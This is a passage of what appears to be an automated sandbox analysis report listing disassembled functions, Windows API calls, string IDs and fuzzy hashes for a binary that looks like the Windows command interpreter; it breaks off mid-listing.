                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                              • String ID: %WINDOWS_COPYRIGHT%
                                              • API String ID: 1103618819-1745581171
                                              • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                              • Instruction ID: a3bab6ffc0421f305a708609079b617eca9dd6ace435842a03f167c34aa8f4f4
                                              • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                              • Instruction Fuzzy Hash: EF41A3A3A1878182EA108F1594103FA73A0FB5DBE8F455235DE9D833A5EF3EE485C705
                                              Function 00007FF6EB1A0774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$_wcslwr
                                              • String ID: [%s]
                                              • API String ID: 886762496-302437576
                                              • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                              • Instruction ID: 177afd252a68ab93ca058ca1520b9aa680b34ba191fc0ba5dba03387951796ac
                                              • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                              • Instruction Fuzzy Hash: 13316933B05B8286EB21CF21D8543E967A0FB8DB98F444035DA8D8B769DF3DE2498705
                                              Function 00007FF6EB199114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: fprintf
                                              • String ID: CMD Internal Error %s$%s$Null environment
                                              • API String ID: 383729395-2781220306
                                              • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                              • Instruction ID: 5536a2873e0241de2371be545cf7da72d6289bd92f35caf4f2b0d95cb0b6a4fa
                                              • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                              • Instruction Fuzzy Hash: AF119133908682C1EA558B14E9402F96261FB4C7F8F445332D67D832F4EF2EE485874A
                                              Function 00007FF6EB1804F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: KERNEL32.DLL$SetThreadUILanguage
                                              • API String ID: 1646373207-2530943252
                                              • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                              • Instruction ID: 3dea42dffc85d8f21959ad4a8c880efcb27f43622a36b88b9bad74bbe207ed66
                                              • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                              • Instruction Fuzzy Hash: 99010863E09B07C5EA448B11B8913F462A0EF4E738F540339D53E923F0DE2E7485870A
                                              Function 00007FF6EB171130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$CurrentDirectorytowupper
                                              • String ID:
                                              • API String ID: 1403193329-0
                                              • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                              • Instruction ID: 28940a929975d41681973c16c69075499e64828228b21c54ffa0d37e7388adbe
                                              • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                              • Instruction Fuzzy Hash: 7C61CE33A18B928AEB20CB21E8403ED37A4FB89768F104134DE5D93BA9DF79E450C705
                                              Function 00007FF6EB184878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp$wcschr
                                              • String ID:
                                              • API String ID: 3270668897-0
                                              • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                              • Instruction ID: 171141bf0dcb904ab1a4cbb9127d434c51bbc51e55c5ecca81bd9a9267663299
                                              • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                                              • Instruction Fuzzy Hash: 5851A313E0C64281EB619F10E4403F8A3A1FF4DBA8F588131DA4EC76F9DE2EE545835A
                                              Function 00007FF6EB19F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveFullNamePathType
                                              • String ID:
                                              • API String ID: 3442494845-0
                                              • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                              • Instruction ID: 116b7926e7ae58be723d5bc75909094960bea220d9b84d6a86078f43e30d1c7a
                                              • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                              • Instruction Fuzzy Hash: C831AF33615BC18AEB60CF11E8443E973A4FB89B88F044035DA4D87B64CF39E245C700
                                              Function 00007FF6EB188F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                              • String ID:
                                              • API String ID: 140117192-0
                                              • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                              • Instruction ID: fa79b173a9db915869f3fecc71684ef5ce07706224ceeb39ef2b6c669e847bd2
                                              • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                              • Instruction Fuzzy Hash: 7441B676A08F4195EB509B18F8903E573A4FB8C768F904036DA8D92774DF7EE548CB05
                                              Function 00007FF6EB188470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcstol$lstrcmp
                                              • String ID:
                                              • API String ID: 3515581199-0
                                              • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                              • Instruction ID: b27757fd27c20424b43842c56d115df4a6b3308f9ef2355141ce87de34d02cc8
                                              • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                              • Instruction Fuzzy Hash: 5D21E433A08742C3E7624B79A5943BAABA0FF4E768F415034DB4F82664DF6EE4458709
                                              Function 00007FF6EB174F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File_get_osfhandle$TimeWrite
                                              • String ID:
                                              • API String ID: 4019809305-0
                                              • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                              • Instruction ID: 841eedb2b92e915e253b8a1e62f7a320c0fcfab1e5dcdf917ea22e3ca0a7e621
                                              • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                              • Instruction Fuzzy Hash: 0E31B723A0879686E7544B14A8443B8A691FF4DB78F045138D90DC3BF9CF3ED844874A
                                              Function 00007FF6EB1A1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveNamePathTypeVolume
                                              • String ID:
                                              • API String ID: 1029679093-0
                                              • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                              • Instruction ID: 792c95c1463159c09c497f4e8b6749e59e4c4b95315d65dd42243521c8148662
                                              • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                              • Instruction Fuzzy Hash: D0313A33705B818AEB208F21D9943E867A4FB8DB98F444135CA4D87758DF3DE659CB05
                                              Function 00007FF6EB187CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcess
                                              • String ID:
                                              • API String ID: 1617791916-0
                                              • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                              • Instruction ID: 6c7f37e0c5b0d58ac474f421fe30810d9f3b33dbe9da694c8aa192d980353a98
                                              • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                              • Instruction Fuzzy Hash: 1F219262A09B4286EA049B51A9402B9B7A1FF8DBE4B059230CE1E877B5DE3DF0058715
                                              Function 00007FF6EB19CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D01C
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D033
                                              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D06D
                                              • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D07F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                              • String ID:
                                              • API String ID: 1033415088-0
                                              • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                              • Instruction ID: 2e6b747dfafb0c4e45c9185557d3327a2206f574ecddac2b5b2c323d0c6b1fb0
                                              • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                              • Instruction Fuzzy Hash: 6C119832618A8287E7444B14F1542BAB7E0FB8EBA9F445135FA8E87B64DF3DD0458F05
                                              Function 00007FF6EB1A10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • wcschr.MSVCRT ref: 00007FF6EB1A11DC
                                              • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6EB19827A), ref: 00007FF6EB1A1277
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcessmemmovewcschr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 4220614737-381716982
                                              • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                              • Instruction ID: 430a79cb411898bf52e844803a0c0f31ff7d27962a3ef321d836fd0a0559ea1f
                                              • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                              • Instruction Fuzzy Hash: F771B37390824286D7608F25A4907F966A4FB9D7BCF500636C94DC3BB4CE3EF4558B09
                                              Function 00007FF6EB1A08EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memmovewcsncmp
                                              • String ID: 0123456789
                                              • API String ID: 3879766669-2793719750
                                              • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                              • Instruction ID: 2f2115648c17e464e55a68419d3083fd1ae8bcb41bdf2b7c5294e5c131bfd03c
                                              • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                              • Instruction Fuzzy Hash: BA41D223F1878A85EA258F2694043FA6394FB4CBA8F445135CE4E837A4DE3DE4498B85
                                              Function 00007FF6EB199784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB1997D0
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
